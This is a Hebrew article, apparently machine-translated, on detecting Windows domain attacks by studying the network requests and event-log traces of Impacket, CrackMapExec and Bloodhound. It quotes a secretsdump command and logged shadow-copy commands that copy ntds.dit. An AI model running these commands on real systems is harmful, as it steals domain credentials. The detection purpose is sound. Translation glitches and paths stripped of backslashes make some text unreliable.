ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื

ืžืกืคืจ ื”ืชืงื™ืคื•ืช ื‘ืžื’ื–ืจ ื”ืืจื’ื•ื ื™ ื’ื“ืœ ืžื“ื™ ืฉื ื”: ืœืžืฉืœ ื‘ืฉื ืช 2017 ื ืจืฉืžื• 13% ื™ื•ืชืจ ืื™ืจื•ืขื™ื ื™ื™ื—ื•ื“ื™ื™ื ืžืืฉืจ ื‘ืฉื ืช 2016, ื•ื‘ืกื•ืฃ 2018 - 27% ื™ื•ืชืจ ืชืงืจื™ื•ืชืžืืฉืจ ื‘ืชืงื•ืคื” ื”ืงื•ื“ืžืช. ื›ื•ืœืœ ืืœื” ืฉื‘ื”ื ื›ืœื™ ื”ืขื‘ื•ื“ื” ื”ืขื™ืงืจื™ ื”ื•ื ืžืขืจื›ืช ื”ื”ืคืขืœื” Windows. ื‘ืฉื ื™ื 2017-2018, ื”-APT Dragonfly, APT28, APT MuddyWater ื‘ื™ืฆืข ื”ืชืงืคื•ืช ืขืœ ืืจื’ื•ื ื™ื ืžืžืฉืœืชื™ื™ื ื•ืฆื‘ืื™ื™ื ื‘ืื™ืจื•ืคื”, ืฆืคื•ืŸ ืืžืจื™ืงื” ื•ืขืจื‘ ื”ืกืขื•ื“ื™ืช. ื•ื”ืฉืชืžืฉื ื• ื‘ืฉืœื•ืฉื” ื›ืœื™ื ื‘ืฉื‘ื™ืœ ื–ื” - Impacket, CrackMapExec ะธ ืงื•ืื“ื™ืง. ืงื•ื“ ื”ืžืงื•ืจ ืฉืœื”ื ืคืชื•ื— ื•ื–ืžื™ืŸ ื‘-GitHub.

ืจืื•ื™ ืœืฆื™ื™ืŸ ืฉื›ืœื™ื ืืœื• ืื™ื ื ืžืฉืžืฉื™ื ืœื—ื“ื™ืจื” ืจืืฉื•ื ื™ืช, ืืœื ืœืคื™ืชื•ื— ื”ืชืงืคื” ื‘ืชื•ืš ื”ืชืฉืชื™ืช. ื”ืชื•ืงืคื™ื ืžืฉืชืžืฉื™ื ื‘ื”ื ื‘ืฉืœื‘ื™ื ืฉื•ื ื™ื ืฉืœ ื”ื”ืชืงืคื” ื‘ืขืงื‘ื•ืช ื—ื“ื™ืจืช ื”ื”ื™ืงืฃ. ืืช ื–ื”, ืื’ื‘, ืงืฉื” ืœื–ื”ื•ืช ื•ืœืจื•ื‘ ืจืง ื‘ืขื–ืจืช ื˜ื›ื ื•ืœื•ื’ื™ื” ื–ื™ื”ื•ื™ ืขืงื‘ื•ืช ืฉืœ ืคืฉืจื” ื‘ืชืขื‘ื•ืจืช ืจืฉืช ืื• ื›ืœื™ื ืฉืžืืคืฉืจื™ื ืœื–ื”ื•ืช ืคืขื•ืœื•ืช ืคืขื™ืœื•ืช ืฉืœ ืชื•ืงืฃ ืœืื—ืจ ืฉื—ื“ืจ ืœืชืฉืชื™ืช. ื”ื›ืœื™ื ืžืกืคืงื™ื ืžื’ื•ื•ืŸ ืคื•ื ืงืฆื™ื•ืช, ืžื”ืขื‘ืจืช ืงื‘ืฆื™ื ื•ืขื“ ืœืื™ื ื˜ืจืืงืฆื™ื” ืขื ื”ืจื™ืฉื•ื ื•ื‘ื™ืฆื•ืข ืคืงื•ื“ื•ืช ื‘ืžื—ืฉื‘ ืžืจื•ื—ืง. ืขืจื›ื ื• ืžื—ืงืจ ืฉืœ ื›ืœื™ื ืืœื” ื›ื“ื™ ืœืงื‘ื•ืข ืืช ืคืขื™ืœื•ืช ื”ืจืฉืช ืฉืœื”ื.

ืžื” ืฉื”ื™ื™ื ื• ืฆืจื™ื›ื™ื ืœืขืฉื•ืช:

  • ื”ื‘ืŸ ื›ื™ืฆื“ ืคื•ืขืœื™ื ื›ืœื™ ืคืจื™ืฆื”. ื’ืœื” ืžื” ื”ืชื•ืงืคื™ื ืฆืจื™ื›ื™ื ืœื ืฆืœ ื•ื‘ืื™ืœื• ื˜ื›ื ื•ืœื•ื’ื™ื•ืช ื”ื ื™ื›ื•ืœื™ื ืœื”ืฉืชืžืฉ.
  • ืžืฆื ืืช ืžื” ืฉืœื ืžื–ื•ื”ื” ืขืœ ื™ื“ื™ ื›ืœื™ ืื‘ื˜ื—ืช ืžื™ื“ืข ื‘ืฉืœื‘ื™ื ื”ืจืืฉื•ื ื™ื ืฉืœ ื”ืชืงืคื”. ื ื™ืชืŸ ืœื“ืœื’ ืขืœ ืฉืœื‘ ื”ืกื™ื•ืจ, ื‘ื™ืŸ ืื ื‘ื’ืœืœ ืฉื”ืชื•ืงืฃ ื”ื•ื ืชื•ืงืฃ ืคื ื™ืžื™, ืื• ื‘ื’ืœืœ ืฉื”ืชื•ืงืฃ ืžื ืฆืœ ื—ื•ืจ ื‘ืชืฉืชื™ืช ืฉืœื ื”ื™ื” ื™ื“ื•ืข ืงื•ื“ื ืœื›ืŸ. ื–ื” ื”ื•ืคืš ืœื”ื™ื•ืช ืืคืฉืจื™ ืœืฉื—ื–ืจ ืืช ื›ืœ ืฉืจืฉืจืช ืคืขื•ืœื•ืชื™ื•, ื•ืžื›ืืŸ ื”ืจืฆื•ืŸ ืœื–ื”ื•ืช ืชื ื•ืขื” ื ื•ืกืคืช.
  • ื”ืกืจ ืชื•ืฆืื•ืช ื—ื™ื•ื‘ื™ื•ืช ื›ื•ื–ื‘ื•ืช ืžื›ืœื™ ื–ื™ื”ื•ื™ ื—ื“ื™ืจื”. ืืกื•ืจ ืœืฉื›ื•ื— ืฉื›ืืฉืจ ืคืขื•ืœื•ืช ืžืกื•ื™ืžื•ืช ืžืชื’ืœื•ืช ืขืœ ื‘ืกื™ืก ืกื™ื•ืจ ื‘ืœื‘ื“, ืชื™ืชื›ืŸ ื˜ืขื•ื™ื•ืช ืชื›ื•ืคื•ืช. ื‘ื“ืจืš ื›ืœืœ ื‘ืชืฉืชื™ืช ื™ืฉ ืžืกืคืจ ืžืกืคื™ืง ืฉืœ ื“ืจื›ื™ื, ืฉืœื ื ื™ืชืŸ ืœื”ื‘ื—ื™ืŸ ืžื”ืœื’ื™ื˜ื™ืžื™ื•ืช ื‘ืžื‘ื˜ ืจืืฉื•ืŸ, ืœื”ืฉื™ื’ ืžื™ื“ืข ื›ืœืฉื”ื•.

ืžื” ื”ื›ืœื™ื ื”ืืœื” ื ื•ืชื ื™ื ืœืชื•ืงืคื™ื? ืื ื–ื” Impacket, ืื– ื”ืชื•ืงืคื™ื ืžืงื‘ืœื™ื ืกืคืจื™ื™ื” ื’ื“ื•ืœื” ืฉืœ ืžื•ื“ื•ืœื™ื ืฉื ื™ืชืŸ ืœื”ืฉืชืžืฉ ื‘ื”ื ื‘ืฉืœื‘ื™ื ืฉื•ื ื™ื ืฉืœ ื”ื”ืชืงืคื” ืฉื™ื‘ื•ืื• ืœืื—ืจ ืคืจื™ืฆืช ื”ื”ื™ืงืฃ. ื›ืœื™ื ืจื‘ื™ื ืžืฉืชืžืฉื™ื ื‘ืžื•ื“ื•ืœื™ Impacket ื‘ืื•ืคืŸ ืคื ื™ืžื™ - ืœื“ื•ื’ืžื”, Metasploit. ื™ืฉ ืœื• dcomexec ื•-wmiexec ืœื‘ื™ืฆื•ืข ืคืงื•ื“ื•ืช ืžืจื—ื•ืง, secretsdump ืœืงื‘ืœืช ื—ืฉื‘ื•ื ื•ืช ืžื”ื–ื™ื›ืจื•ืŸ ืฉืžืชื•ื•ืกืคื™ื ืž-Impacket. ื›ืชื•ืฆืื” ืžื›ืš, ื–ื™ื”ื•ื™ ื ื›ื•ืŸ ืฉืœ ืคืขื™ืœื•ืช ืกืคืจื™ื™ื” ื›ื–ื• ื™ื‘ื˜ื™ื— ื–ื™ื”ื•ื™ ืฉืœ ื ื’ื–ืจื•ืช.

ื–ื” ืœื ืžืงืจื™ ืฉื”ื™ื•ืฆืจื™ื ื›ืชื‘ื• ืืช "Powered by Impacket" ืขืœ CrackMapExec (ืื• ืคืฉื•ื˜ CME). ื‘ื ื•ืกืฃ, ืœ-CME ื™ืฉ ืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ืžื•ื›ื ื” ืขื‘ื•ืจ ืชืจื—ื™ืฉื™ื ืคื•ืคื•ืœืจื™ื™ื: Mimikatz ืœื”ืฉื’ืช ืกื™ืกืžืื•ืช ืื• ื”ื’ื™ื‘ื•ื‘ื™ื ืฉืœื”ืŸ, ื”ื˜ืžืขืช Meterpreter ืื• ืกื•ื›ืŸ Empire ืœื‘ื™ืฆื•ืข ืžืจื—ื•ืง, ื•-Bloodhound ืขืœ ื”ืกื™ืคื•ืŸ.

ื”ื›ืœื™ ื”ืฉืœื™ืฉื™ ืฉื‘ื—ืจื ื• ื”ื™ื” Koadic. ื”ื•ื ื“ื™ ืขื“ื›ื ื™, ื”ื•ื ื”ื•ืฆื’ ื‘ื›ื ืก ื”ืืงืจื™ื ื”ื‘ื™ื ืœืื•ืžื™ DEFCON 25 ื‘ืฉื ืช 2017 ื•ื”ื•ื ื ื‘ื“ืœ ื‘ื’ื™ืฉื” ืœื ืกื˜ื ื“ืจื˜ื™ืช: ื”ื•ื ืคื•ืขืœ ื‘ืืžืฆืขื•ืช HTTP, Java Script ื•-Microsoft Visual Basic Script (VBS). ื’ื™ืฉื” ื–ื• ื ืงืจืืช ืœื—ื™ื•ืช ืžื—ื•ืฅ ืœืื“ืžื”: ื”ื›ืœื™ ืžืฉืชืžืฉ ื‘ืกื˜ ืฉืœ ืชืœื•ืช ื•ืกืคืจื™ื•ืช ื”ืžื•ื‘ื ื•ืช ื‘-Windows. ื”ื™ื•ืฆืจื™ื ืงื•ืจืื™ื ืœื–ื” COM Command & Control, ืื• C3.

IMPACKET

ื”ืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ืฉืœ Impacket ืจื—ื‘ื” ืžืื•ื“, ื”ื—ืœ ืžืกื™ื•ืจ ื‘ืชื•ืš AD ื•ืื™ืกื•ืฃ ื ืชื•ื ื™ื ืžืฉืจืชื™ MS SQL ืคื ื™ืžื™ื™ื, ื•ืขื“ ืœื˜ื›ื ื™ืงื•ืช ืœื”ืฉื’ืช ืื™ืฉื•ืจื™ื: ื–ื•ื”ื™ ืžืชืงืคืช ืžืžืกืจ SMB, ื•ื”ืฉื’ืช ื”ืงื•ื‘ืฅ ntds.dit ื”ืžื›ื™ืœ ื’ื™ื‘ื•ื‘ ืฉืœ ืกื™ืกืžืื•ืช ืžืฉืชืžืฉ ืžื‘ืงืจ ืชื—ื•ื. Impacket ื’ื ืžื‘ืฆืขืช ืคืงื•ื“ื•ืช ืžืจื—ื•ืง ื‘ืืžืฆืขื•ืช ืืจื‘ืข ืฉื™ื˜ื•ืช ืฉื•ื ื•ืช: WMI, Windows Scheduler Management Service, DCOM ื•-SMB, ื•ื“ื•ืจืฉ ืื™ืฉื•ืจื™ื ืœืฉื ื›ืš.

Secretsdump

ื‘ื•ืื• ื ืกืชื›ืœ ืขืœ secretsdump. ื–ื”ื• ืžื•ื“ื•ืœ ืฉื™ื›ื•ืœ ืœื›ื•ื•ืŸ ื’ื ืœืžื›ื•ื ื•ืช ืžืฉืชืžืฉ ื•ื’ื ืœื‘ืงืจื™ ืชื—ื•ื. ื ื™ืชืŸ ืœื”ืฉืชืžืฉ ื‘ื• ื›ื“ื™ ืœื”ืฉื™ื’ ืขื•ืชืงื™ื ืฉืœ ืื–ื•ืจื™ ื–ื™ื›ืจื•ืŸ LSA, SAM, SECURITY, NTDS.dit, ื›ืš ืฉื ื™ืชืŸ ืœืจืื•ืช ืื•ืชื• ื‘ืฉืœื‘ื™ื ืฉื•ื ื™ื ืฉืœ ื”ื”ืชืงืคื”. ื”ืฉืœื‘ ื”ืจืืฉื•ืŸ ื‘ืคืขื•ืœืช ื”ืžื•ื“ื•ืœ ื”ื•ื ืื™ืžื•ืช ื‘ืืžืฆืขื•ืช SMB, ื”ืžืฆืจื™ืš ืืช ื”ืกื™ืกืžื” ืฉืœ ื”ืžืฉืชืžืฉ ืื• ื”-hash ืฉืœื• ื›ื“ื™ ืœื‘ืฆืข ืื•ื˜ื•ืžื˜ื™ืช ืืช ืžืชืงืคืช Pass the Hash. ืœืื—ืจ ืžื›ืŸ ืžื’ื™ืขื” ื‘ืงืฉื” ืœืคืชื•ื— ื’ื™ืฉื” ืœ-Service Control Manager (SCM) ื•ืœืงื‘ืœ ื’ื™ืฉื” ืœืจื™ืฉื•ื ื‘ืืžืฆืขื•ืช ืคืจื•ื˜ื•ืงื•ืœ winreg, ื‘ืืžืฆืขื•ืชื• ื™ื›ื•ืœ ืชื•ืงืฃ ืœื’ืœื•ืช ืืช ื”ื ืชื•ื ื™ื ืฉืœ ืขื ืคื™ ืขื ื™ื™ืŸ ื•ืœืงื‘ืœ ืชื•ืฆืื•ืช ื‘ืืžืฆืขื•ืช SMB.

ื‘ืื™ื•ืจ. 1 ืื ื• ืจื•ืื™ื ื›ื™ืฆื“ ื‘ื“ื™ื•ืง ื‘ืขืช ืฉื™ืžื•ืฉ ื‘ืคืจื•ื˜ื•ืงื•ืœ winreg, ื”ื’ื™ืฉื” ืžืชืงื‘ืœืช ื‘ืืžืฆืขื•ืช ืžืคืชื— ืจื™ืฉื•ื ืขื LSA. ืœืฉื ื›ืš, ื”ืฉืชืžืฉ ื‘ืคืงื•ื“ื” DCERPC ืขื opcode 15 - OpenKey.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 1. ืคืชื™ื—ืช ืžืคืชื— ืจื™ืฉื•ื ื‘ืืžืฆืขื•ืช ืคืจื•ื˜ื•ืงื•ืœ winreg

ืœืื—ืจ ืžื›ืŸ, ื›ืืฉืจ ืžืชืงื‘ืœืช ื’ื™ืฉื” ืœืžืคืชื—, ื”ืขืจื›ื™ื ื ืฉืžืจื™ื ืขื ื”ืคืงื•ื“ื” SaveKey ืขื opcode 20. Impacket ืขื•ืฉื” ื–ืืช ื‘ืฆื•ืจื” ืžืื•ื“ ืกืคืฆื™ืคื™ืช. ื–ื” ืฉื•ืžืจ ืืช ื”ืขืจื›ื™ื ืœืงื•ื‘ืฅ ืฉืฉืžื• ื”ื•ื ืžื—ืจื•ื–ืช ืฉืœ 8 ืชื•ื•ื™ื ืืงืจืื™ื™ื ื”ืžืฆื•ืจืคื™ื ืœ-.tmp. ื‘ื ื•ืกืฃ, ื”ืขืœืื” ื ื•ืกืคืช ืฉืœ ืงื•ื‘ืฅ ื–ื” ืžืชืจื—ืฉืช ื‘ืืžืฆืขื•ืช SMB ืžืกืคืจื™ื™ืช System32 (ืื™ื•ืจ 2).

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 2. ืชื•ื›ื ื™ืช ืœืงื‘ืœืช ืžืคืชื— ืจื™ืฉื•ื ืžืžื—ืฉื‘ ืžืจื•ื—ืง

ืžืกืชื‘ืจ ืฉื ื™ืชืŸ ืœื–ื”ื•ืช ืคืขื™ืœื•ืช ื›ื–ื• ื‘ืจืฉืช ืขืœ ื™ื“ื™ ืฉืื™ืœืชื•ืช ืœืกื ื™ืคื™ ืจื™ืฉื•ื ืžืกื•ื™ืžื™ื ื‘ืืžืฆืขื•ืช ืคืจื•ื˜ื•ืงื•ืœ winreg, ืฉืžื•ืช ืกืคืฆื™ืคื™ื™ื, ืคืงื•ื“ื•ืช ื•ืกื“ืจื.

ืžื•ื“ื•ืœ ื–ื” ื’ื ืžืฉืื™ืจ ืขืงื‘ื•ืช ื‘ื™ื•ืžืŸ ื”ืื™ืจื•ืขื™ื ืฉืœ Windows, ืžื” ืฉืžืงืœ ืขืœ ื–ื™ื”ื•ื™ื•. ืœืžืฉืœ, ื›ืชื•ืฆืื” ืžื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื”

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

ื‘ื™ื•ืžืŸ Windows Server 2016 ื ืจืื” ืืช ืจืฆืฃ ื”ืื™ืจื•ืขื™ื ื”ืžืคืชื— ื”ื‘ื:

1. 4624 - ื›ื ื™ืกื” ืžืจื—ื•ืง.
2. 5145 - ื‘ื“ื™ืงืช ื–ื›ื•ื™ื•ืช ื’ื™ืฉื” ืœืฉื™ืจื•ืช ืžืจื—ื•ืง winreg.
3. 5145 - ื‘ื“ื™ืงืช ื–ื›ื•ื™ื•ืช ื’ื™ืฉื” ืœืงื‘ืฆื™ื ื‘ืกืคืจื™ื™ืช System32. ืœืงื•ื‘ืฅ ื™ืฉ ืืช ื”ืฉื ื”ืืงืจืื™ ืฉื”ื•ื–ื›ืจ ืœืขื™ืœ.
4. 4688 - ื™ืฆื™ืจืช ืชื”ืœื™ืš cmd.exe ืฉืžืคืขื™ืœ ืืช vssadmin:

โ€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ื™ืฆื™ืจืช ืชื”ืœื™ืš ืขื ื”ืคืงื•ื“ื”:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ื™ืฆื™ืจืช ืชื”ืœื™ืš ืขื ื”ืคืงื•ื“ื”:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ื™ืฆื™ืจืช ืชื”ืœื™ืš ืขื ื”ืคืงื•ื“ื”:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

ื›ืžื• ื›ืœื™ื ืจื‘ื™ื ืœืื—ืจ ื ื™ืฆื•ืœ, ืœ-Impacket ื™ืฉ ืžื•ื“ื•ืœื™ื ืœื‘ื™ืฆื•ืข ืคืงื•ื“ื•ืช ืžืจื—ื•ืง. ื ืชืžืงื“ ื‘-smbexec, ื”ืžืกืคืงืช ืžืขื˜ืคืช ืคืงื•ื“ื” ืื™ื ื˜ืจืืงื˜ื™ื‘ื™ืช ื‘ืžื—ืฉื‘ ืžืจื•ื—ืง. ืžื•ื“ื•ืœ ื–ื” ื“ื•ืจืฉ ื’ื ืื™ืžื•ืช ื‘ืืžืฆืขื•ืช SMB, ืื• ืขื ืกื™ืกืžื” ืื• hash ืฉืœ ืกื™ืกืžื”. ื‘ืื™ื•ืจ. ื‘ืื™ื•ืจ 3 ืื ื• ืจื•ืื™ื ื“ื•ื’ืžื” ืœืื•ืคืŸ ืฉื‘ื• ืคื•ืขืœ ื›ืœื™ ื›ื–ื”, ื‘ืžืงืจื” ื–ื” ืžื“ื•ื‘ืจ ื‘ืžืกื•ืฃ ื”ืžื ื”ืœ ื”ืžืงื•ืžื™.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 3. ืงื•ื ืกื•ืœืช smbexec ืื™ื ื˜ืจืืงื˜ื™ื‘ื™ืช

ื”ืฉืœื‘ ื”ืจืืฉื•ืŸ ืฉืœ smbexec ืœืื—ืจ ื”ืื™ืžื•ืช ื”ื•ื ืคืชื™ื—ืช ื”-SCM ืขื ื”ืคืงื•ื“ื” OpenSCManagerW (15). ื”ืฉืื™ืœืชื” ื‘ื•ืœื˜ืช: ื”ืฉื“ื” MachineName ื”ื•ื DUMMY.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 4. ื‘ืงืฉ ืœืคืชื•ื— ืืช ืžื ื”ืœ ื‘ืงืจืช ื”ืฉื™ืจื•ืช

ืœืื—ืจ ืžื›ืŸ, ื”ืฉื™ืจื•ืช ื ื•ืฆืจ ื‘ืืžืฆืขื•ืช ื”ืคืงื•ื“ื” CreateServiceW (12). ื‘ืžืงืจื” ืฉืœ smbexec, ืื ื• ื™ื›ื•ืœื™ื ืœืจืื•ืช ืืช ืื•ืชื• ื”ื™ื’ื™ื•ืŸ ื‘ื ื™ื™ืช ืคืงื•ื“ื” ื‘ื›ืœ ืคืขื. ื‘ืื™ื•ืจ. 5 ื™ืจื•ืง ืžืฆื™ื™ืŸ ืคืจืžื˜ืจื™ ืคืงื•ื“ื” ื‘ืœืชื™ ื ื™ืชื ื™ื ืœืฉื™ื ื•ื™, ืฆื”ื•ื‘ ืžืฆื™ื™ืŸ ืžื” ื”ืชื•ืงืฃ ื™ื›ื•ืœ ืœืฉื ื•ืช. ืงืœ ืœืจืื•ืช ืฉื ื™ืชืŸ ืœืฉื ื•ืช ืืช ื”ืฉื ืฉืœ ืงื•ื‘ืฅ ื”ื”ืคืขืœื”, ื”ืกืคืจื™ื™ื” ืฉืœื• ื•ืงื•ื‘ืฅ ื”ืคืœื˜, ืื‘ืœ ืืช ื”ืฉืืจ ื”ืจื‘ื” ื™ื•ืชืจ ืงืฉื” ืœืฉื ื•ืช ืžื‘ืœื™ ืœื”ืคืจื™ืข ืœื”ื™ื’ื™ื•ืŸ ืฉืœ ืžื•ื“ื•ืœ ื”-Impacket.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 5. ื‘ืงืฉ ืœื™ืฆื•ืจ ืฉื™ืจื•ืช ื‘ืืžืฆืขื•ืช Service Control Manager

Smbexec ื’ื ืžืฉืื™ืจ ืขืงื‘ื•ืช ื‘ืจื•ืจื™ื ื‘ื™ื•ืžืŸ ื”ืื™ืจื•ืขื™ื ืฉืœ Windows. ื‘ื™ื•ืžืŸ Windows Server 2016 ืขื‘ื•ืจ ืžืขื˜ืคืช ื”ืคืงื•ื“ื” ื”ืื™ื ื˜ืจืืงื˜ื™ื‘ื™ืช ืขื ื”ืคืงื•ื“ื” ipconfig, ื ืจืื” ืืช ืจืฆืฃ ื”ืื™ืจื•ืขื™ื ื”ืžืคืชื— ื”ื‘ื:

1. 4697 - ื”ืชืงื ืช ื”ืฉื™ืจื•ืช ื‘ืžื›ืฉื™ืจ ืฉืœ ื”ืงื•ืจื‘ืŸ:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ื™ืฆื™ืจืช ืชื”ืœื™ืš cmd.exe ืขื ื”ืืจื’ื•ืžื ื˜ื™ื ืžื ืงื•ื“ื” 1.
3. 5145 - ื‘ื“ื™ืงืช ื–ื›ื•ื™ื•ืช ื’ื™ืฉื” ืœืงื•ื‘ืฅ __output ื‘ืกืคืจื™ื™ืช C$.
4. 4697 - ื”ืชืงื ืช ื”ืฉื™ืจื•ืช ื‘ืžื›ื•ื ื” ืฉืœ ื”ื ืคื’ืข.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ื™ืฆื™ืจืช ืชื”ืœื™ืš cmd.exe ืขื ื”ืืจื’ื•ืžื ื˜ื™ื ืžื ืงื•ื“ื” 4.
6. 5145 - ื‘ื“ื™ืงืช ื–ื›ื•ื™ื•ืช ื’ื™ืฉื” ืœืงื•ื‘ืฅ __output ื‘ืกืคืจื™ื™ืช C$.

Impacket ื”ื•ื ื”ื‘ืกื™ืก ืœืคื™ืชื•ื— ื›ืœื™ ืชืงื™ืคื”. ื”ื•ื ืชื•ืžืš ื›ืžืขื˜ ื‘ื›ืœ ื”ืคืจื•ื˜ื•ืงื•ืœื™ื ื‘ืชืฉืชื™ืช Windows ื•ื‘ื• ื‘ื–ืžืŸ ื™ืฉ ืœื• ืชื›ื•ื ื•ืช ืื•ืคื™ื™ื ื™ื•ืช ืžืฉืœื•. ื”ื ื” ื‘ืงืฉื•ืช ืกืคืฆื™ืคื™ื•ืช ืฉืœ Winreg, ื•ื”ืฉื™ืžื•ืฉ ื‘- SCM API ืขื ื™ืฆื™ืจืช ืคืงื•ื“ื•ืช ืื•ืคื™ื™ื ื™ืช, ื•ืคื•ืจืžื˜ ืฉื ื”ืงื•ื‘ืฅ, ื•ืฉื™ืชื•ืฃ SMB SYSTEM32.

CRACKMAPEXEC

ื›ืœื™ ื”-CME ื ื•ืขื“ ื‘ืขื™ืงืจ ืœื‘ืฆืข ืื•ื˜ื•ืžืฆื™ื” ืฉืœ ืคืขื•ืœื•ืช ืฉื’ืจืชื™ื•ืช ืฉืชื•ืงืฃ ืฆืจื™ืš ืœื‘ืฆืข ื›ื“ื™ ืœื”ืชืงื“ื ื‘ืชื•ืš ื”ืจืฉืช. ื–ื” ืžืืคืฉืจ ืœืš ืœืขื‘ื•ื“ ื‘ืฉื™ืชื•ืฃ ืขื ืกื•ื›ืŸ ื”ืื™ืžืคืจื™ื” ื”ื™ื“ื•ืข ื•ืžื˜ืจืคืจื˜ืจ. ื›ื“ื™ ืœื‘ืฆืข ืคืงื•ื“ื•ืช ื‘ืื•ืคืŸ ืกืžื•ื™, CME ื™ื›ื•ืœ ืœื˜ืฉื˜ืฉ ืื•ืชืŸ. ื‘ืืžืฆืขื•ืช Bloodhound (ื›ืœื™ ืกื™ื•ืจ ื ืคืจื“), ืชื•ืงืฃ ื™ื›ื•ืœ ืœื”ืคื•ืš ืืช ื”ื—ื™ืคื•ืฉ ืœืื•ื˜ื•ืžื˜ื™ ืฉืœ ื”ืคืขืœืช ืžื ื”ืœ ื“ื•ืžื™ื™ืŸ ืคืขื™ืœื”.

ื›ึถึผืœึถื‘ ื’ึดืฉืื•ึผืฉื

Bloodhound, ื›ื›ืœื™ ืขืฆืžืื™, ืžืืคืฉืจ ืกื™ื•ืจ ืžืชืงื“ื ื‘ืชื•ืš ื”ืจืฉืช. ื”ื•ื ืื•ืกืฃ ื ืชื•ื ื™ื ืขืœ ืžืฉืชืžืฉื™ื, ืžื›ื•ื ื•ืช, ืงื‘ื•ืฆื•ืช, ื”ืคืขืœื•ืช ื•ืžืกื•ืคืง ื›ืกืงืจื™ืคื˜ PowerShell ืื• ืงื•ื‘ืฅ ื‘ื™ื ืืจื™. ืคืจื•ื˜ื•ืงื•ืœื™ื ืžื‘ื•ืกืกื™ LDAP ืื• SMB ืžืฉืžืฉื™ื ืœืื™ืกื•ืฃ ืžื™ื“ืข. ืžื•ื“ื•ืœ ื”ืื™ื ื˜ื’ืจืฆื™ื” CME ืžืืคืฉืจ ื”ื•ืจื“ื” ืฉืœ Bloodhound ืœืžื—ืฉื‘ ืฉืœ ื”ืงื•ืจื‘ืŸ, ืœื”ืจื™ืฅ ื•ืœืงื‘ืœ ืืช ื”ื ืชื•ื ื™ื ืฉื ืืกืคื• ืœืื—ืจ ื”ื‘ื™ืฆื•ืข, ื•ื‘ื›ืš ืœื”ืคื•ืš ืคืขื•ืœื•ืช ื‘ืžืขืจื›ืช ืœืื•ื˜ื•ืžื˜ื™ื•ืช ื•ืœื”ืคื•ืš ืื•ืชืŸ ืœืคื—ื•ืช ื‘ื•ืœื˜ื•ืช. ื”ืงืœื™ืคื” ื”ื’ืจืคื™ืช ืฉืœ Bloodhound ืžืฆื™ื’ื” ืืช ื”ื ืชื•ื ื™ื ืฉื ืืกืคื• ื‘ืฆื•ืจื” ืฉืœ ื’ืจืคื™ื, ื”ืžืืคืฉืจื™ื ืœืš ืœืžืฆื•ื ืืช ื”ื“ืจืš ื”ืงืฆืจื” ื‘ื™ื•ืชืจ ืžื”ืžื—ืฉื‘ ืฉืœ ื”ืชื•ืงืฃ ืœืžื ื”ืœ ื”ื“ื•ืžื™ื™ืŸ.

ื›ื™ืฆื“ ืœื–ื”ื•ืช ื”ืชืงืคื•ืช ืขืœ ืชืฉืชื™ืช Windows: ืœื™ืžื•ื“ ื›ืœื™ ื”ืืงืจื™ื
ืื•ืจื–. 6. ืžืžืฉืง Bloodhound

